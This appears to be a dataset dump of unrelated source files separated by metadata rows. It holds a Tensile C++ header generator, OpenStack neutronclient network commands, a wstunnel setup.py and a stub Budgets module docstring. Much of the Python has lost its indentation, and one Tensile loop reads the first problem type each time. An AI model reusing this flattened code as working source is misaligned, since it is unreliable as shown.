functionIdxForDataType = 0
for problemTypeIdxForDataType in range(0, \
len(problemTypesForDataType[dataType])):
problemType = \
problemTypesForDataType[dataType][problemTypeIdxForDataType]
problemTypes.append(problemType)
functionIdxForProblemType = 0
for functionIdxForProblemType in range(0, \
len(schedulesForProblemType[problemType])):
functionInfo.append([ \
dataTypeIdxSerial, \
problemTypeIdxForDataType, \
problemTypeIdxSerial, \
functionIdxSerial,\
functionIdxForDataType,\
functionIdxForProblemType, \
])
functionIdxForProblemType += 1
functionIdxForDataType += 1
functionIdxSerial += 1
problemTypeIdxSerial += 1
numProblemTypes = problemTypeIdxSerial
numFunctions = functionIdxSerial
h += "const unsigned int numFunctions = %u;\n" % numFunctions
##############################################################################
# Data Types
##############################################################################
h += "/* data types */\n"
numDataTypes = len(dataTypes)
h += "const unsigned int numDataTypes = %u;\n" % numDataTypes
h += "const DataTypeEnum dataTypeEnums[numDataTypes] = { enum_%s" \
% dataTypes[0].toCpp()
for dataTypeIdx in range(1, numDataTypes):
h += ", enum_%s" % dataTypes[dataTypeIdx].toCpp();
h += " };\n"
# bytes per elements
h += "const unsigned int bytesPerElement[numDataTypes] = { %u" \
% (dataTypes[0].numBytes())
for dataTypeIdx in range(1, numDataTypes):
dataType = dataTypes[dataTypeIdx]
h += ", %u" % dataType.numBytes()
h += " };\n"
# flops per mac
h += "const unsigned int numFlopsPerMac[numDataTypes] = { %u" \
% (2 if dataTypes[0].isReal() else 8)
for dataTypeIdx in range(1, numDataTypes):
dataType = dataTypes[dataTypeIdx]
h += ", %u" % (2 if dataType.isReal() else 8)
h += " };\n"
for dataTypeIdx in range(0, numDataTypes):
h += "#define Tensile_DATA_TYPE_%s\n" \
% dataTypes[dataTypeIdx].toCpp().upper()
##############################################################################
# Problem Types
##############################################################################
h += "/* problem types */\n"
h += "const unsigned int numProblemTypes = %u;\n" % numProblemTypes
# Num C Indices
h += "const unsigned int numIndicesC[numProblemTypes] = { %u" \
% problemTypes[0]["NumIndicesC"]
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %u" % problemType["NumIndicesC"]
h += " };\n"
# Num AB Indices
maxNumIndicesAB = len(problemTypes[0]["IndexAssignmentsA"])
h += "const unsigned int numIndicesAB[numProblemTypes] = { %u" \
% len(problemTypes[0]["IndexAssignmentsA"])
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
numIndicesAB = len(problemType["IndexAssignmentsA"])
h += ", %u" % numIndicesAB
maxNumIndicesAB = max(numIndicesAB, maxNumIndicesAB)
h += " };\n"
h += "const unsigned int maxNumIndicesAB = %u;\n" % maxNumIndicesAB
# Index Assignments A
h += "const unsigned int indexAssignmentsA[numProblemTypes][maxNumIndicesAB] = {\n"
for problemTypeIdx in range(0, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
indices = problemType["IndexAssignmentsA"]
h += " { %u" % indices[0]
for i in range(1, maxNumIndicesAB):
if i < len(indices):
h += ", %u" % indices[i]
else:
h += ", static_cast<unsigned int>(-1)"
if problemTypeIdx < numProblemTypes-1:
h += " },\n"
else:
h += " }\n"
h += "};\n"
# Index Assignments B
h += "const unsigned int indexAssignmentsB[numProblemTypes][maxNumIndicesAB] = {\n"
for problemTypeIdx in range(0, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
indices = problemType["IndexAssignmentsB"]
h += " { %u" % indices[0]
for i in range(1, maxNumIndicesAB):
if i < len(indices):
h += ", %u" % indices[i]
else:
h += ", static_cast<unsigned int>(-1)"
if problemTypeIdx < numProblemTypes-1:
h += " },\n"
else:
h += " }\n"
h += "};\n"
# beta
h += "bool useBeta[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["UseBeta"] else "false")
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemType["UseBeta"] else "false")
h += " };\n"
# Complex Conjugates
h += "const bool complexConjugateA[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["ComplexConjugateA"] else "false" )
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemTypes[0]["ComplexConjugateA"] else "false" )
h += " };\n"
h += "const bool complexConjugateB[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["ComplexConjugateB"] else "false" )
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemTypes[0]["ComplexConjugateB"] else "false" )
h += " };\n"
h += "\n"
if not forBenchmark:
h += "// dataTypeIdxSerial, problemTypeIdxForDataType, problemTypeIdxSerial, functionIdxSerial, functionIdxForDataType, functionIdxForProblemType\n"
first = True
h += "const unsigned int functionInfo[numFunctions][6] = {\n"
for info in functionInfo:
h += "%s{ %u, %u, %u, %u, %u, %u }" % (" " if first else ",\n ", \
info[0], info[1], info[2], info[3], info[4], info[5] )
first = False
h += " };\n"
##############################################################################
# Problem Sizes
##############################################################################
maxNumIndices = problemTypes[0]["TotalIndices"]
if not forBenchmark:
for problemType in problemTypes:
maxNumIndices = max(problemType["TotalIndices"], maxNumIndices)
h += "const unsigned int maxNumIndices = %u;\n" % maxNumIndices
h += "const unsigned int totalIndices[numProblemTypes] = { %u" \
% problemTypes[0]["TotalIndices"]
for problemTypeIdx in range(1, numProblemTypes):
h += ", %u" % problemTypes[problemTypeIdx]["TotalIndices"]
h += " };\n"
if forBenchmark:
h += "const unsigned int numProblems = %u;\n" \
% problemSizes.totalProblemSizes
h += "const unsigned int problemSizes[numProblems][%u] = {\n" \
% problemTypes[0]["TotalIndices"]
for i in range(0, problemSizes.totalProblemSizes):
line = " {%5u" %problemSizes.sizes[i][0]
for j in range(1, problemTypes[0]["TotalIndices"]):
line += ",%5u" % problemSizes.sizes[i][j]
line += " }"
h += line
if i < problemSizes.totalProblemSizes-1:
h += ","
else:
h += "};"
h += "\n"
else:
h += "unsigned int userSizes[maxNumIndices];\n"
if forBenchmark:
h += "/* problem sizes */\n"
"""
h += "const bool indexIsSized[maxNumIndices] = {"
for i in range(0, problemSizes.totalIndices):
h += " %s" % ("true" if problemSizes.indexIsSized[i] else "false")
if i < problemSizes.totalIndices-1:
h += ","
h += " };\n"
h += "const unsigned int numIndicesSized = %u;\n" \
% len(problemSizes.indicesSized)
h += "const unsigned int indicesSized[numIndicesSized][4] = {\n"
h += "// { min, stride, stride_incr, max }\n"
for i in range(0, len(problemSizes.indicesSized)):
r = problemSizes.indicesSized[i]
h += " { %u, %u, %u, %u }" % (r[0], r[1], r[2], r[3])
if i < len(problemSizes.indicesSized)-1:
h += ","
h += "\n"
h += " };\n"
numIndicesMapped = len(problemSizes.indicesMapped)
h += "const unsigned int numIndicesMapped = %u;\n" % numIndicesMapped
if numIndicesMapped > 0:
h += "#define Tensile_INDICES_MAPPED 1\n"
h += "const unsigned int indicesMapped[numIndicesMapped] = {"
for i in range(0, numIndicesMapped):
h += " %u" % problemSizes.indicesMapped[i]
if i < numIndicesMapped-1:
h += ","
h += " };\n"
else:
h += "#define Tensile_INDICES_MAPPED 0\n"
"""
##############################################################################
# Max Problem Sizes
##############################################################################
if forBenchmark:
h += "size_t maxSizeC = %u;\n" % (problemSizes.maxC)
h += "size_t maxSizeA = %u;\n" % (problemSizes.maxA)
h += "size_t maxSizeB = %u;\n" % (problemSizes.maxB)
h += "\n"
else:
h += "size_t maxSizeC;\n"
h += "size_t maxSizeA;\n"
h += "size_t maxSizeB;\n"
h += "\n"
##############################################################################
# Current Problem Size
##############################################################################
h += "/* current problem size */\n"
#h += "unsigned int fullSizes[maxNumIndices];\n"
#h += "unsigned int currentSizedIndexSizes[numIndicesSized];\n"
#h += "unsigned int currentSizedIndexIncrements[numIndicesSized];\n"
h += "\n"
##############################################################################
# Solutions
##############################################################################
if forBenchmark:
h += "/* solutions */\n"
# Problem Type Indices
h += "const unsigned int maxNumSolutions = %u;\n" % len(solutions)
h += "float solutionPerf[numProblems][maxNumSolutions]; // milliseconds\n"
h += "\n"
# Solution Ptrs
h += "typedef TensileStatus (*SolutionFunctionPointer)(\n"
argList = solutionWriter.getArgList(solutions[0]["ProblemType"], True, True, True)
for i in range(0, len(argList)):
h += " %s %s%s" % (argList[i][0], argList[i][1], \
",\n" if i < len(argList)-1 else ");\n\n")
h += "const SolutionFunctionPointer solutions[maxNumSolutions] = {\n"
for i in range(0, len(solutions)):
solution = solutions[i]
solutionName = solutionWriter.getSolutionName(solution)
h += " %s" % solutionName
if i < len(solutions)-1:
h += ","
h += "\n"
h += " };\n"
h += "\n"
# Solution Names
h += "const char *solutionNames[maxNumSolutions] = {\n"
for i in range(0, len(solutions)):
solution = solutions[i]
solutionName = solutionWriter.getSolutionName(solution)
h += " \"%s\"" % solutionName
if i < len(solutions)-1:
h += ","
h += "\n"
h += " };\n"
h += "\n"
else:
# Function Names
functionNames = []
for dataType in dataTypes:
for problemType in problemTypesForDataType[dataType]:
for scheduleName in schedulesForProblemType[problemType]:
#functionNames.append("tensile_%s_%s" % (scheduleName, problemType))
functionNames.append("tensile_%s" % (problemType))
h += "const char *functionNames[numFunctions] = {\n"
for functionIdx in range(0, len(functionNames)):
functionName = functionNames[functionIdx]
h += " \"%s\"%s\n" % (functionName, \
"," if functionIdx < len(functionNames)-1 else "" )
h += " };\n"
##############################################################################
# Runtime Structures
##############################################################################
h += "/* runtime structures */\n"
h += "TensileStatus status;\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += "cl_platform_id platform;\n"
h += "cl_device_id device;\n"
h += "cl_context context;\n"
h += "cl_command_queue stream;\n"
else:
h += "hipStream_t stream;\n"
#h += "int deviceIdx = %u;\n" \
# % (globalParameters["Device"])
h += "\n"
h += "void *deviceC;\n"
h += "void *deviceA;\n"
h += "void *deviceB;\n"
##############################################################################
# Benchmarking and Validation Parameters
##############################################################################
h += "\n/* benchmarking parameters */\n"
#h += "const bool measureKernelTime = %s;\n" \
# % ("true" if globalParameters["KernelTime"] else "false")
#h += "const unsigned int numEnqueuesPerSync = %u;\n" \
# % (globalParameters["EnqueuesPerSync"])
#h += "const unsigned int numSyncsPerBenchmark = %u;\n" \
# % (globalParameters["SyncsPerBenchmark"])
#h += "unsigned int numElementsToValidate = %s;\n" \
# % (str(globalParameters["NumElementsToValidate"]) \
# if globalParameters["NumElementsToValidate"] >= 0 \
# else "0xFFFFFFFF" )
#h += "unsigned int validationMaxToPrint = %u;\n" \
# % globalParameters["ValidationMaxToPrint"]
#h += "bool validationPrintValids = %s;\n" \
# % ("true" if globalParameters["ValidationPrintValids"] else "false")
h += "size_t validationStride;\n"
#h += "unsigned int dataInitTypeC = %s;\n" % globalParameters["DataInitTypeC"]
#h += "unsigned int dataInitTypeAB = %s;\n" % globalParameters["DataInitTypeAB"]
h += "\n"
##############################################################################
# Generated Call to Reference
##############################################################################
h += "/* generated call to reference */\n"
h += "template<typename DataType>\n"
h += "TensileStatus generatedCallToReferenceCPU(\n"
h += " const unsigned int *sizes,\n"
h += " DataType *referenceC,\n"
h += " DataType *initialA,\n"
h += " DataType *initialB,\n"
h += " DataType alpha,\n"
h += " DataType beta) {\n"
h += " return tensileReferenceCPU(\n"
h += " referenceC,\n"
h += " initialA,\n"
h += " initialB,\n"
h += " alpha,\n"
h += " beta,\n"
h += " totalIndices[problemTypeIdx],\n"
h += " sizes,\n"
h += " numIndicesC[problemTypeIdx],\n"
h += " numIndicesAB[problemTypeIdx],\n"
h += " indexAssignmentsA[problemTypeIdx],\n"
h += " indexAssignmentsB[problemTypeIdx],\n"
h += " complexConjugateA[problemTypeIdx],\n"
h += " complexConjugateB[problemTypeIdx],\n"
h += " validationStride );\n"
h += "};\n"
h += "\n"
##############################################################################
# Generated Call to Solution
##############################################################################
if forBenchmark:
problemType = solutions[0]["ProblemType"]
h += "/* generated call to solution */\n"
h += "template<typename DataType>\n"
h += "TensileStatus generatedCallToSolution(\n"
h += " unsigned int solutionIdx,\n"
h += " const unsigned int *sizes,\n"
h += " DataType alpha,\n"
h += " DataType beta, \n"
h += " unsigned int numEvents = 0, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list = NULL,\n"
h += " cl_event *outputEvent = NULL ) {\n"
else:
h += " hipEvent_t *startEvent = NULL,\n"
h += " hipEvent_t *stopEvent = NULL ) {\n"
h += " // calculate parameters assuming packed data\n"
# strides
indexChars = globalParameters["IndexChars"]
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
# calculate strides
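    # Sketch of the emitted C++ for a hypothetical 3-index C tensor
    # (assuming indexChars begins "i", "j", "k"):
    #   unsigned int strideC0i = 1;
    #   unsigned int strideC1j = 1*sizes[0];
    #   unsigned int strideC2k = 1*sizes[0]*sizes[1];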
for i in range(0,lastStrideC):
h += " unsigned int strideC%u%s = 1" % (i, indexChars[i])
for j in range(0, i):
h += "*sizes[%i]" % j
h += ";\n"
for i in range(0,lastStrideA):
h += " unsigned int strideA%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsA"][j]
h += ";\n"
for i in range(0,lastStrideB):
h += " unsigned int strideB%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsB"][j]
h += ";\n"
for i in range(0, problemType["TotalIndices"]):
h += " unsigned int size%s = sizes[%u];\n" % (indexChars[i], i)
h += "\n"
# function call
h += " // call solution function\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " return solutions[solutionIdx]( static_cast<cl_mem>(deviceC), static_cast<cl_mem>(deviceA), static_cast<cl_mem>(deviceB),\n"
else:
typeName = dataTypes[0].toCpp()
h += " return solutions[solutionIdx]( static_cast<%s *>(deviceC), static_cast<%s *>(deviceA), static_cast<%s *>(deviceB),\n" \
% (typeName, typeName, typeName)
h += " alpha,\n"
if problemType["UseBeta"]:
h += " beta,\n"
h += " 0, 0, 0, // offsets\n"
for i in range(firstStride,lastStrideC):
h += " strideC%u%s,\n" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
h += " strideA%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
h += " strideB%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
h += " size%s,\n" % indexChars[i]
h += " stream,\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " numEvents, event_wait_list, outputEvent ); // events\n"
else:
h += " numEvents, startEvent, stopEvent); // events\n"
h += "};\n"
h += "\n"
else:
############################################################################
# Generated Call to Function
############################################################################
for enqueue in [True, False]:
functionName = "tensile" if enqueue else "tensileGetSolutionName"
returnName = "TensileStatus" if enqueue else "const char *"
h += "/* generated call to function */\n"
h += "template<typename DataType>\n"
h += "%s generatedCallTo_%s(\n" % (returnName, functionName)
h += " unsigned int *sizes,\n"
h += " DataType alpha,\n"
h += " DataType beta, \n"
h += " unsigned int numEvents = 0, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list = NULL,\n"
h += " cl_event *outputEvent = NULL );\n\n"
else:
h += " hipEvent_t *startEvent = NULL,\n"
h += " hipEvent_t *stopEvent = NULL );\n\n"
for dataType in dataTypes:
typeName = dataType.toCpp()
functionsForDataType = []
for problemType in problemTypesForDataType[dataType]:
for scheduleName in schedulesForProblemType[problemType]:
functionsForDataType.append([scheduleName, problemType])
h += "template<>\n"
h += "inline %s generatedCallTo_%s<%s>(\n" \
% (returnName, functionName, typeName)
h += " unsigned int *sizes,\n"
h += " %s alpha,\n" % typeName
h += " %s beta,\n" % typeName
h += " unsigned int numEvents, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list,\n"
h += " cl_event *outputEvent ) {\n\n"
else:
h += " hipEvent_t *startEvent,\n"
h += " hipEvent_t *stopEvent ) {\n\n"
h += " unsigned int functionIdxForDataType = functionInfo[functionIdx][4];\n"
for functionIdx in range(0, len(functionsForDataType)):
function = functionsForDataType[functionIdx]
scheduleName = function[0]
problemType = function[1]
if len(functionsForDataType)> 1:
if functionIdx == 0:
h += " if (functionIdxForDataType == %u) {\n" % functionIdx
elif functionIdx == len(functionsForDataType)-1:
h += " } else {\n"
else:
h += " } else if (functionIdxForDataType == %u) {\n" \
% functionIdx
# strides
indexChars = globalParameters["IndexChars"]
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
# calculate strides
for i in range(0,lastStrideC):
h += " unsigned int strideC%u%s = 1" % (i, indexChars[i])
for j in range(0, i):
h += "*sizes[%i]" % j
h += ";\n"
for i in range(0,lastStrideA):
h += " unsigned int strideA%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsA"][j]
h += ";\n"
for i in range(0,lastStrideB):
h += " unsigned int strideB%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsB"][j]
h += ";\n"
for i in range(0, problemType["TotalIndices"]):
h += " unsigned int size%s = sizes[%u];\n" % (indexChars[i], i)
# function call
h += " // call solution function\n"
h += " return %s_%s(\n" % (functionName, problemType)
if enqueue:
if globalParameters["RuntimeLanguage"] == "OCL":
h += " static_cast<cl_mem>(deviceC),\n"
h += " static_cast<cl_mem>(deviceA),\n"
h += " static_cast<cl_mem>(deviceB),\n"
else:
h += " static_cast<%s *>(deviceC),\n" % typeName
h += " static_cast<%s *>(deviceA),\n" % typeName
h += " static_cast<%s *>(deviceB),\n" % typeName
h += " alpha,\n"
if problemType["UseBeta"]:
h += " beta,\n"
h += " 0, 0, 0, // offsets\n"
for i in range(firstStride,lastStrideC):
h += " strideC%u%s,\n" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
h += " strideA%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
h += " strideB%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
h += " size%s,\n" % indexChars[i]
h += " stream"
if enqueue:
if globalParameters["RuntimeLanguage"] == "OCL":
h += ",\n numEvents, event_wait_list, outputEvent"
else:
h += ",\n numEvents, startEvent, stopEvent"
h += ");\n"
if len(functionsForDataType) > 1:
h += " }\n" # close last if
h += "};\n" # close callToFunction
##############################################################################
# Results File Name
##############################################################################
if forBenchmark:
h += "/* results file name */\n"
resultsFileName = os.path.join(globalParameters["WorkingPath"], \
"../../Data","%s.csv" % stepName)
resultsFileName = resultsFileName.replace("\\", "\\\\")
h += "const char *resultsFileName = \"%s\";\n" % resultsFileName
##############################################################################
# Write File
##############################################################################
clientParametersFile = open(os.path.join(globalParameters["WorkingPath"], \
"ClientParameters.h"), "w")
clientParametersFile.write(CHeader)
clientParametersFile.write(h)
clientParametersFile.close()
|
mit
| 2,385,873,656,909,588,000
| 40.421791
| 152
| 0.550992
| false
| 3.774872
| false
| false
| false
|
eayunstack/python-neutronclient
|
neutronclient/neutron/v2_0/network.py
|
1
|
8760
|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import argparse
from neutronclient._i18n import _
from neutronclient.common import exceptions
from neutronclient.common import utils
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.neutron.v2_0 import availability_zone
from neutronclient.neutron.v2_0 import dns
from neutronclient.neutron.v2_0.qos import policy as qos_policy
def _format_subnets(network):
try:
return '\n'.join([' '.join([s['id'], s.get('cidr', '')])
for s in network['subnets']])
except (TypeError, KeyError):
return ''
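# Illustrative rendering (hypothetical IDs): a network with two subnets is
# formatted as "subnet-1 10.0.0.0/24\nsubnet-2 10.0.1.0/24" in the list output.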
class ListNetwork(neutronV20.ListCommand):
"""List networks that belong to a given tenant."""
# Length of a query filter on subnet id
# id=<uuid>& (with len(uuid)=36)
subnet_id_filter_len = 40
resource = 'network'
_formatters = {'subnets': _format_subnets, }
list_columns = ['id', 'name', 'subnets']
pagination_support = True
sorting_support = True
filter_attrs = [
'tenant_id',
'name',
'admin_state_up',
{'name': 'status',
'help': _("Filter %s according to their operation status."
"(For example: ACTIVE, ERROR etc)"),
'boolean': False,
'argparse_kwargs': {'type': utils.convert_to_uppercase}},
{'name': 'shared',
'help': _('Filter and list the networks which are shared.'),
'boolean': True},
{'name': 'router:external',
'help': _('Filter and list the networks which are external.'),
'boolean': True},
{'name': 'tags',
'help': _("Filter and list %s which has all given tags. "
"Multiple tags can be set like --tags <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'tags_any',
'help': _("Filter and list %s which has any given tags. "
"Multiple tags can be set like --tags-any <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'not_tags',
'help': _("Filter and list %s which does not have all given tags. "
"Multiple tags can be set like --not-tags <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'not_tags_any',
'help': _("Filter and list %s which does not have any given tags. "
"Multiple tags can be set like --not-tags-any "
"<tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
]
def extend_list(self, data, parsed_args):
"""Add subnet information to a network list."""
neutron_client = self.get_client()
search_opts = {'fields': ['id', 'cidr']}
if self.pagination_support:
page_size = parsed_args.page_size
if page_size:
search_opts.update({'limit': page_size})
subnet_ids = []
for n in data:
if 'subnets' in n:
subnet_ids.extend(n['subnets'])
def _get_subnet_list(sub_ids):
search_opts['id'] = sub_ids
return neutron_client.list_subnets(
**search_opts).get('subnets', [])
try:
subnets = _get_subnet_list(subnet_ids)
except exceptions.RequestURITooLong as uri_len_exc:
# The URI is too long because of too many subnet_id filters
# Use the excess attribute of the exception to know how many
# subnet_id filters can be inserted into a single request
subnet_count = len(subnet_ids)
max_size = ((self.subnet_id_filter_len * subnet_count) -
uri_len_exc.excess)
chunk_size = max_size // self.subnet_id_filter_len
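            # Worked example (illustrative numbers): 300 subnet ids at 40
            # chars of filter each is ~12000 chars of query; if the URI
            # limit was exceeded by excess = 4000, then max_size = 8000
            # and chunk_size = 200, i.e. two requests of 200 and 100 ids.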
subnets = []
for i in range(0, subnet_count, chunk_size):
subnets.extend(
_get_subnet_list(subnet_ids[i: i + chunk_size]))
subnet_dict = dict([(s['id'], s) for s in subnets])
for n in data:
if 'subnets' in n:
n['subnets'] = [(subnet_dict.get(s) or {"id": s})
for s in n['subnets']]
class ListExternalNetwork(ListNetwork):
"""List external networks that belong to a given tenant."""
pagination_support = True
sorting_support = True
def retrieve_list(self, parsed_args):
external = '--router:external=True'
if external not in self.values_specs:
            self.values_specs.append(external)
return super(ListExternalNetwork, self).retrieve_list(parsed_args)
class ShowNetwork(neutronV20.ShowCommand):
"""Show information of a given network."""
resource = 'network'
class CreateNetwork(neutronV20.CreateCommand, qos_policy.CreateQosPolicyMixin):
"""Create a network for a given tenant."""
resource = 'network'
def add_known_arguments(self, parser):
parser.add_argument(
'--admin-state-down',
dest='admin_state', action='store_false',
help=_('Set admin state up to false.'))
parser.add_argument(
'--admin_state_down',
dest='admin_state', action='store_false',
help=argparse.SUPPRESS)
parser.add_argument(
'--shared',
action='store_true',
help=_('Set the network as shared.'),
default=argparse.SUPPRESS)
parser.add_argument(
'--provider:network_type',
metavar='<network_type>',
help=_('The physical mechanism by which the virtual network'
' is implemented.'))
parser.add_argument(
'--provider:physical_network',
metavar='<physical_network_name>',
help=_('Name of the physical network over which the virtual '
'network is implemented.'))
parser.add_argument(
'--provider:segmentation_id',
metavar='<segmentation_id>',
help=_('VLAN ID for VLAN networks or tunnel-id for GRE/VXLAN '
'networks.'))
utils.add_boolean_argument(
parser,
'--vlan-transparent',
default=argparse.SUPPRESS,
help=_('Create a VLAN transparent network.'))
parser.add_argument(
'name', metavar='NAME',
help=_('Name of the network to be created.'))
parser.add_argument(
'--description',
help=_('Description of network.'))
self.add_arguments_qos_policy(parser)
availability_zone.add_az_hint_argument(parser, self.resource)
dns.add_dns_argument_create(parser, self.resource, 'domain')
def args2body(self, parsed_args):
body = {'name': parsed_args.name,
'admin_state_up': parsed_args.admin_state}
neutronV20.update_dict(parsed_args, body,
['shared', 'tenant_id',
'vlan_transparent',
'provider:network_type',
'provider:physical_network',
'provider:segmentation_id',
'description'])
self.args2body_qos_policy(parsed_args, body)
availability_zone.args2body_az_hint(parsed_args, body)
dns.args2body_dns_create(parsed_args, body, 'domain')
return {'network': body}
class DeleteNetwork(neutronV20.DeleteCommand):
"""Delete a given network."""
resource = 'network'
class UpdateNetwork(neutronV20.UpdateCommand, qos_policy.UpdateQosPolicyMixin):
"""Update network's information."""
resource = 'network'
def add_known_arguments(self, parser):
self.add_arguments_qos_policy(parser)
dns.add_dns_argument_update(parser, self.resource, 'domain')
def args2body(self, parsed_args):
body = {}
self.args2body_qos_policy(parsed_args, body)
dns.args2body_dns_update(parsed_args, body, 'domain')
return {'network': body}
|
apache-2.0
| 5,446,808,212,747,097,000
| 36.758621
| 79
| 0.573973
| false
| 4.231884
| false
| false
| false
|
ffalcinelli/wstunnel
|
setup.py
|
1
|
4807
|
#!/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2013 Fabio Falcinelli
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from setuptools import setup, find_packages
import wstunnel
__author__ = 'fabio'
kwargs = dict(name='wstunnel',
version='0.0.6',
description='A Python WebSocket Tunnel',
author='Fabio Falcinelli',
author_email='fabio.falcinelli@gmail.com',
url='https://github.com/ffalcinelli/wstunnel',
keywords=['tunneling', 'websocket', 'ssl'],
packages=find_packages(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Intended Audience :: Telecommunications Industry',
'License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
setup_requires=['nose'],
test_suite='nose.collector')
kwargs["download_url"] = 'https://github.com/ffalcinelli/wstunnel/tarball/{0}'.format(kwargs.get("version"))
install_requires = ["PyYAML>=3.10",
"tornado>=3.0.2",
"nose>=1.3.0",
"mock>=1.0.1"]
if not sys.platform.startswith("win"):
kwargs["install_requires"] = install_requires
kwargs["entry_points"] = {
"console_scripts": [
"wstuncltd = wstunnel.daemon.wstuncltd:main",
"wstunsrvd = wstunnel.daemon.wstunsrvd:main",
]
}
else:
install_requires.extend(["pywin32>=218",
"py2exe>=0.6.9", ])
if "py2exe" in sys.argv:
if wstunnel.PY2:
from wstunnel.svc import wstunsrvd, wstuncltd
import py2exe
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = kwargs["version"]
self.company_name = "N.A."
self.copyright = "Copyright (c) 2014 Fabio Falcinelli"
self.name = kwargs["name"]
tunclt_svc = Target(
# used for the versioninfo resource
description=wstuncltd.wstuncltd._svc_description_,
# what to build. For a service, the module name (not the
# filename) must be specified!
modules=["wstunnel.svc.wstuncltd"],
cmdline_style='pywin32',
)
tunsrv_svc = Target(
# used for the versioninfo resource
description=wstunsrvd.wstunsrvd._svc_description_,
# what to build. For a service, the module name (not the
# filename) must be specified!
modules=["wstunnel.svc.wstunsrvd"],
cmdline_style='pywin32',
)
kwargs["service"] = [tunclt_svc, tunsrv_svc]
kwargs["options"] = {
"py2exe": {
"compressed": 1,
"optimize": 2,
}
}
else:
sys.stderr.write("Warning: you're using python {0}.{1}.{2} "
"which is not supported yet by py2exe.\n".format(sys.version_info[0],
sys.version_info[1],
sys.version_info[2]))
sys.exit(-1)
else:
kwargs["entry_points"] = {
"console_scripts": [
"wstuncltd = wstunnel.svc.wstuncltd:main",
"wstunsrvd = wstunnel.svc.wstunsrvd:main",
]
}
setup(**kwargs)
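# Typical invocations (illustrative): `python setup.py install` on POSIX
# platforms, or `python setup.py py2exe` on Windows under Python 2 to build
# the wstuncltd/wstunsrvd services.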
|
lgpl-3.0
| 5,581,825,389,117,905,000
| 38.735537
| 108
| 0.524027
| false
| 4.176368
| false
| false
| false
|
garyd203/flying-circus
|
src/flyingcircus/_raw/budgets.py
|
1
|
1096
|
"""Raw representations of every data type in the AWS Budgets service.
See Also:
`AWS developer guide for Budgets
<https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/>`_
This file is automatically generated, and should not be directly edited.
"""
